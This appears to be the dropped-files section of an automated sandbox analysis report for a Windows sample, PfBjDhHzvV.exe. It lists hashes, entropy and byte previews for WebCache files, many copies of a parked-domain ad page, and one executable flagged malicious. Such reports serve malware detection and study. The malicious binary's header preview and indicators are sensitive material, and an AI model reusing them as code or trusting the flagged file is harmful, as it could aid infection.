                                                                                                                                                                                                                                  Preview:.p.|..........+.....:.I..(...{..................C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\.........................................................................................................................................................................................................C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\..........................................................................................................................................................................................................0u.............................................................................+............................. ..........P.......h.%.......#......./..(...{..................C.:.\.U.s.e.r.s.\.f.r.o.n.t.d.e.s.k.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.W.e.b.C.a.c.h.e.\.W.e.b.C.a.c.h.e.V.0.1...d.a.t............................................................................................................
Process:C:\Windows\System32\dllhost.exe
File Type:data
Category:dropped
Size (bytes):524288
Entropy (8bit):2.2240426504802597
Encrypted:false
SSDEEP:1536:fxv7Cfw/1p+bv6bohNWXx7SY1ihhdePWkAWcKcUfEbb4QO4Xurs/L:fxAKaeoe7SYsdePWkAWXcbbU4urs/L
MD5:71EAC33A177EC7446049B5603D5180CB
SHA1:E5DE8B8DB44A2026B14B7FD37AD2239FFBD71421
SHA-256:3EEF2888E39598248141C5CBD4E235001D1C74B336B76217DAEE0CB82C5E7A0E
SHA-512:60135F300C9E6748E33DD2CF912144952251A274F2E981A9B7F1471BC9F77DF3355EC04A1B91830FA5C7C019543F6212BEBDA1A61B78F4B09AA7A2AC96AAFB54
Malicious:false
                                                                                                                                                                                                                                  Preview:..E.............93...{a..2...{+.........<...:.I..(...{..................C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\.........................................................................................................................................................................................................C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\..........................................................................................................................................................................................................0u.............................................$..........V...".".#......... ..g.......P.......h.%.......#......./..(...{..................C.:.\.U.s.e.r.s.\.f.r.o.n.t.d.e.s.k.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.W.e.b.C.a.c.h.e.\.W.e.b.C.a.c.h.e.V.0.1...d.a.t....................................................................................................................
Process:C:\Windows\System32\dllhost.exe
File Type:Extensible storage engine DataBase, version 0x620, checksum 0x2e72a4bb, page size 32768, Windows version 10.0
Category:dropped
Size (bytes):14680064
Entropy (8bit):0.9773279575512861
Encrypted:false
SSDEEP:6144:4gMnQEUUMBPPpBPJmNjfiEWC7WswQpWK/qZCCkxpu514dCVZ3L9yqXx4SU8GxJHL:Zn/cj5tND5ApBK4K
MD5:29F82281C71286ECE678EF8D3353F39C
SHA1:E0B3BFB686049528A0A9A16AAFE5C4F68B5B3EBC
SHA-256:4679C5565085531BAA90A292345918061367A2F5A2746DCAA9A8D6CE8274F466
SHA-512:254D1854B01182C6C97FE21503C358DF41429E6C9FF39EDA110A975000431B8FC7814B2AAD508EE5AD29373FD6402BBB7B3D5CA9770804BF32FFE41FEC542487
Malicious:false
                                                                                                                                                                                                                                  Preview:.r..... ................./..(...{........................*.....)'...|...&...|K.h.(.....)'...|....*.........:.I..(...{..............................................................................................P...........eJ......n........................................................................................................... ............................................................................................................................................................................................................(...{.................................../.j)'...|.....................)'...|...........................#........*.....................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\System32\dllhost.exe
File Type:data
Category:dropped
Size (bytes):16384
Entropy (8bit):0.12241959681009394
Encrypted:false
SSDEEP:3:cllaNz6+xiDfl1mCifel0VAl1allrECXlFllKIlnr4Nj/VQ3luP89lmKwoJlEzM7:cuz6jmC25X1OI3VuP83JCD/+
MD5:9F0153FC7A694840BED1ABB9AF0EE2CD
SHA1:E41A453C42905D880C064C20D0AFB23FBB119B85
SHA-256:EB1A059A11B8C94A8A6ABDCBFC481777C3B63E1112EAC860BCB18B49BE222A74
SHA-512:CF123E090852B0822BBF720393DC5BB71A2E381762AAB488733A5B589E4BF0C4F10DDE085A3BAAAB603B87DA9F31D5A1419FD62F0AAF7DC5AB487D5B486D5535
Malicious:false
                                                                                                                                                                                                                                  Preview:F#......................................(...{...&...|K.)'...|...........&...|..)'...|..D...('...|.....................)'...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Users\user\Desktop\PfBjDhHzvV.exe
File Type:HTML document, ASCII text, with very long lines (361)
Category:dropped
Size (bytes):2265
Entropy (8bit):5.651181889423068
Encrypted:false
SSDEEP:48:+mazpFpFmDMqUtmtE9VC4oZcBx73M7ioaxyi6CVegMTf992wP:6QBUh9VGODSi1yi7ul928
MD5:745EDF4FB8CC3C21A446C7B387BA5C26
SHA1:73E922306210D7F4C1113CDA1F2E32235A3D2A3B
SHA-256:07ABE523B383759E38A286D40B45254CAFDC25D44C9A706901A641FB3322E49F
SHA-512:380B28389D620B317417DA91708EB1B423010D3544F5A05B62334676C54428C6CEA3D400584EF677E5146C9D034EEA2CF32E9BF72C02C8FDF79C4D02E9A4FD79
Malicious:false
                                                                                                                                                                                                                                  Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTIzNzA5Ni43MDU2OjM3NGZkZjRiMTNmYTJjMTZlY2E5Y2FlYjcyMWIxYWU4MmM2ZWJlYzk2MGVjZjI0ODY5NzlhZmQ3ZTViNTk5Yzg6NjcxMjEwNjhhYzQ0ZA==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyMTA2OGFjNDIwfHx8MTcyOTIzNzA5
Process:C:\Users\user\Desktop\PfBjDhHzvV.exe
File Type:HTML document, ASCII text, with very long lines (361)
Category:dropped
Size (bytes):2265
Entropy (8bit):5.654954590625863
Encrypted:false
SSDEEP:48:+mazpFMg/okOMqUtmtE9VCWaXcBq3M7ioaxyi6CVyvMTf992wP:tWOUh9Vd7Di1yi7yml928
MD5:9EA1A2C8077843C859DCCA86EC873B61
SHA1:25E681DE8E936CA42866DEC81DBC992FE4B4F6E2
SHA-256:C29A829E5AFE3366E77CF6D20772C7A2D03566A7F4DFBAC86D66C4285072E0DE
SHA-512:21ECFF3C6457878AAC650E4C831F262DFF93FB72CD6ECEA396F48BA70D8EC6001C27BEFA1B38635762EC2C2EA70442AEFD33BB015183B23F079E256AB9DD25B6
Malicious:false
                                                                                                                                                                                                                                  Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTIzNzEzNC44NTE2Ojc2YmVhZDAzYzg2N2VhYzkyM2U3OTc5YWE1MjkwZTMyMmNmNTZmMjdlMWRhNzI2MDQ2MGEzZGQwN2UyODA2Yzc6NjcxMjEwOGVjZmViMg==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyMTA4ZWNmZTg3fHx8MTcyOTIzNzEz
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\PfBjDhHzvV.exe
                                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2265
                                                                                                                                                                                                                                  Entropy (8bit):5.648242834013477
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:+mazpFOEjhfpMqUtmtE9VCtUcBk3M7ioaxyi6CVqKMTf992wP:ZIzUh9VmnNi1yi7ol928
                                                                                                                                                                                                                                  MD5:E40B5EFFA1AC4F83A6836BC2A6F58FC1
                                                                                                                                                                                                                                  SHA1:F7C2DBF4C53B7E9535C1DC0013DC43ABD91AA854
                                                                                                                                                                                                                                  SHA-256:45912746F933987457D510577A74C87B9194402749DDC68A91388906A7DACA04
                                                                                                                                                                                                                                  SHA-512:53D40D5E3203A26DEB880E165C58B0BB9011E499BDB54076D48B3514ABDFBDD17A59A48D9977BFD3A13EB7E028441E9464B79A437337227282D995F88367BAE3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTIzNzEyOS40MjUzOmFhMGY1MjkzNTE2NWJhMWI3MzhkNTFkZTE4NGM5MjVmN2YyZDBiNGNhMDUxMzZlZThjZWY1MGIzMzEwYzE4MmQ6NjcxMjEwODk2N2Q4MA==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyMTA4OTY3ZDNjfHx8MTcyOTIzNzEy
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\PfBjDhHzvV.exe
                                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2265
                                                                                                                                                                                                                                  Entropy (8bit):5.64139213293994
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:+mazpF2k2UMqUtmtE9VCi/cBndL3M7ioaxyi6CVGPMTf992wP:tk2gUh9VCtdCi1yi7GGl928
                                                                                                                                                                                                                                  MD5:783FA9FAC79180247F7BEE379940BE4A
                                                                                                                                                                                                                                  SHA1:2728610B19A555D5C0D5685D61903B7586E02C2D
                                                                                                                                                                                                                                  SHA-256:3C37753AB2059DB730CDF5C7342F20FF1229EF497C1186C060580615B962137B
                                                                                                                                                                                                                                  SHA-512:92EF06D098370D7A40EB818788548B8CAFA62C158EF84D1C0B9ED8F9CD703F74F1E4B0F7FB07D208E16E647B88EB8BD6B2A5A180540B798988795D4D090C85A0
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTIzNzExMy4xMTU5OmYzYjMwYzhlY2MwMzdhMDNjYjhlN2ZlNWQ5MjI5NWU4NDE1YTlmNzk0ZmE3ZjljZWQwMjYzMDA1YWM0NGEyNjk6NjcxMjEwNzkxYzRhNw==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyMTA3OTFjNDYyfHx8MTcyOTIzNzEx
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):66561
                                                                                                                                                                                                                                  Entropy (8bit):7.972055187583809
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:kyCBW71fQeKxc3xWTGb6gv8tGRC7uon1swHIgjZjHsHk:PCAhIeKxc3xrTOF7ocME
                                                                                                                                                                                                                                  MD5:8A5ACDA760458188753DB2855CE8A647
                                                                                                                                                                                                                                  SHA1:4C94C43E82D444D8F251E64AC01AAF7DD9556D0B
                                                                                                                                                                                                                                  SHA-256:D0B44A40D2E15CD97BDD873A5DD8834212A5779A58DE5A22A8D4DEC37B5C5BD9
                                                                                                                                                                                                                                  SHA-512:3795C6769AF6E0FF75000A9325AA0CD9AD860BA24548EA7F7601122BAD9C68CDF1C318D55D2A8BD3CD2B5357D040A2BF405AC179CB02856B0A20D8046C48CC45
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......E.r..o...o...o...o...o..cp...o...p...o..Rich.o..........PE..L....N.L..................................... ....@.......................... ..................................................(....................................................................................................................text.............................?. ................................................................_.n..~..%...S..t=..w....].@UE.U.....U..E.....E..M.....M..U.....U..E.....E..M.....M..U.....U.h N......@.j.....@.3...]...........................................................}.ExitProcess...Sleep.d.SetErrorMode..KERNEL32.dll..............................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\PfBjDhHzvV.exe
                                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2265
                                                                                                                                                                                                                                  Entropy (8bit):5.644485814214793
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:+mazpFJdylYMqUtmtE9VC98cBL3M7ioaxyi6CVWMMTf992wP:iyl0Uh9Vyv4i1yi7Wtl928
                                                                                                                                                                                                                                  MD5:1B5804DCC3E0E447273A37E386BAB698
                                                                                                                                                                                                                                  SHA1:D8EF2BB5616516C2D593064A4FC85686DDC779B6
                                                                                                                                                                                                                                  SHA-256:F942A52030922B80931DBE84BF5B207C281517F4F54938C723EB3971310C0A1B
                                                                                                                                                                                                                                  SHA-512:52B8195C009A9BFC618BB1F9011700D274F7240D7182021375FDCE17160B588A10583EEADC836F33DAE5826E6477F6CD3EE2703BCDD3C043E8344F8421A340F9
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTIzNzE1Ny4xODQ3OjM4ZDU4NWYzMzZhZjU4OGNjNzdkOGEzM2RiNzg4MTRjYjlkMDNhMjE1Y2ZlZTAwNjhiNzIzNTYwMjNkZTlkYzQ6NjcxMjEwYTUyZDE3NQ==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyMTBhNTJkMTQ5fHx8MTcyOTIzNzE1
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\PfBjDhHzvV.exe
                                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2261
                                                                                                                                                                                                                                  Entropy (8bit):5.657829036895418
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:+mazpFS+3MqUtmtE9VCdcBUss3M7ioaxyi6CVNawMTf992wP:rAUh9VpBi1yi7Ngl928
                                                                                                                                                                                                                                  MD5:7E630BF5035BAF8879FB1D888EDDC188
                                                                                                                                                                                                                                  SHA1:4A609F3B178899FB51B8695CD2C1BDECC02B180D
                                                                                                                                                                                                                                  SHA-256:7151F462D424C60A10027D29546BA9A2796CDDC2DFCCC16C9EBD586FF0B34607
                                                                                                                                                                                                                                  SHA-512:29AD185242ACADC54791B1541F8169696A2CCD80F48CB73718EFB0A7F0DB2E98D50EDDB1AC8EEDC6BEF749DA798C2CB32F74D31D61CEE39AD7BBFF74AAF02E9B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTIzNzE0MC4xNjc6MjI0ZGI4NzNkMjczNjRiMjVlYjc2OTRmMTQ0MzQwODVhMjQ0MDJhYmEzOTJlZGE4ZTA2MzczNzQ0Y2IzYzE0MTo2NzEyMTA5NDI4YzJj';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyMTA5NDI4YmVhfHx8MTcyOTIzNzE0MC4z
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\PfBjDhHzvV.exe
                                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2261
                                                                                                                                                                                                                                  Entropy (8bit):5.6509399844661115
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:+mazpFSFpMqUtmtE9VCEEaDcB9L3M7ioaxyi6CVnMTf992wP:LdUh9VzboGi1yi7el928
                                                                                                                                                                                                                                  MD5:7898CACF217FDCA7D651C95D5B9F037D
                                                                                                                                                                                                                                  SHA1:7D45C12E5805F2E005DBA6502EBA68E91199DD89
                                                                                                                                                                                                                                  SHA-256:03B864DA472902B37773ABF50A22B1F11471161FBD423AA4B96CBB8C0436756E
                                                                                                                                                                                                                                  SHA-512:52997874E7F381CB2B47A03BB3CE4B891E1B698D271BB05B7ECBC97C0C69EC799E622BCE4D6331251B74E19BD60ABE37A9AC60CF288499CE35F96C1029CE5844
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTIzNzEwNy43MDU6NzFmNmM3NGY0OGIwYjk2MDMxMTVhMTg3NWFmY2NmNzdmZDJjNjdhNTAxY2QyNTFiOTdlOGE0M2IwMjMzZDk5OTo2NzEyMTA3M2FjMWZm';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyMTA3M2FjMWJkfHx8MTcyOTIzNzEwNy45
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\PfBjDhHzvV.exe
                                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2265
                                                                                                                                                                                                                                  Entropy (8bit):5.645824350884002
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:+mazpFGg5f4MqUtmtE9VCUe8cB0PzG3M7ioaxyi6CVYvMTf992wP:/EsUh9VrevaBi1yi7Yml928
                                                                                                                                                                                                                                  MD5:B41E617E5F4CEE9FD15961D97D22040C
                                                                                                                                                                                                                                  SHA1:1211764AFE20632C259E87189262F1F7DF983C54
                                                                                                                                                                                                                                  SHA-256:2CDF399E285B658595439EC99C4A8133D18374F993FA84B96945C77B39574466
                                                                                                                                                                                                                                  SHA-512:E866E2F8A0FE45BB099E7A7081EF31A276C41B2C216BDB4F5C92C02DA973507E899246F95EEA5886E86FE0D9642DEDD1FE05D1DE79187D15187DBF05F27BD824
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTIzNzEyMy44ODMyOjc4NWM3OTYxZmFiZGIyMmY2NDgxNWM0YjIyNmJjZDk1MGQ1ZGY0NWJkNjg1NTgzZTgwMjFhNWE0NGI4ZWZkZTQ6NjcxMjEwODNkN2EwMw==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyMTA4M2Q3OWMzfHx8MTcyOTIzNzEy
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\PfBjDhHzvV.exe
                                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2265
                                                                                                                                                                                                                                  Entropy (8bit):5.65897367629714
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:+mazpF97rqsMqUtmtE9VCR2fTcB9t3M7ioaxyi6CVI4MMTf992wP:QiIUh9V74H4i1yi7Iml928
                                                                                                                                                                                                                                  MD5:D58F94CA3A28E21BAF476E9D73BDBC47
                                                                                                                                                                                                                                  SHA1:2AA3417744DDDA35B969F48D46E5077E32FF1B75
                                                                                                                                                                                                                                  SHA-256:1312829F5D39BC1DAB591B73DBE83609C171EEAE6CAC9746E850E65E10DDD881
                                                                                                                                                                                                                                  SHA-512:39C2CC7DB984C17727FF8095ECD493C32B0C5B9EC1F77BBECEDE6E48705698892E7AB450FFBE932A743009E897BF71F4802EAF7C5FBDD98C483D141B9D27B430
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTIzNzE3My4zOTIzOjlkNDA5ZTg1ZjNiMmM0YzhiZWY2N2Q3ODNlMmY5MzIzYTRlYzQ2N2ZjODA0NjFmMjg2Nzc1YmQwZGU4NmJlMWU6NjcxMjEwYjU1ZmM5MA==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyMTBiNTVmYzYyfHx8MTcyOTIzNzE3
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\PfBjDhHzvV.exe
                                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2265
                                                                                                                                                                                                                                  Entropy (8bit):5.653747819543308
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:+mazpFTrZ/MqUtmtE9VCfAcqcBYY9ti3M7ioaxyi6CVGiMTf992wP:cZ9Uh9VqAcNuYti1yi7Gbl928
                                                                                                                                                                                                                                  MD5:BA1BABB1B8DCEE7CD0B3CC6DE441EB38
                                                                                                                                                                                                                                  SHA1:5E8F59877484510E3FAA193F148F3C1A645E92FD
                                                                                                                                                                                                                                  SHA-256:DAC955618A08D6FCCF2085AAD998CFE7A5B1309C6D34BAA4637DD4A6F359CE80
                                                                                                                                                                                                                                  SHA-512:C710F4BC3E2A62CFACADF6729CDA4B703B77EAF3616AA4DE18F5FE8F2CDA0B203A14FA99CF59E79B255D334860640A4A5866070066CAA57AD88DDC70FC2857AC
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTIzNzE1MS43ODM4OmJlNTJhYzcxZmZmZGMwYTQwMzRlNjAxNGFkZGU2YjNlMTMyOGUyNGRlODBhMmY3ZDQyZTQyMWRjZDg3MDFlMjQ6NjcxMjEwOWZiZjU4ZQ==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyMTA5ZmJmNTQ3fHx8MTcyOTIzNzE1
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe
                                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                  Size (bytes):2261
                                                                                                                                                                                                                                  Entropy (8bit):5.644234335820176
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:+mazpFBUmHMqUtmtE9VCxducBZl3M7ioaxyi6CV/MTf992wP:ZAUh9V8dxwi1yi72l928
                                                                                                                                                                                                                                  MD5:807C9A4FBF59556D7101247E4F422027
                                                                                                                                                                                                                                  SHA1:8565E68C9DDC14796E9FA63D6E8E013B3B16D660
                                                                                                                                                                                                                                  SHA-256:791CF03299117EF1404CD965ECF6F16E3E54B80A949A4F3771AADC09AC47FA37
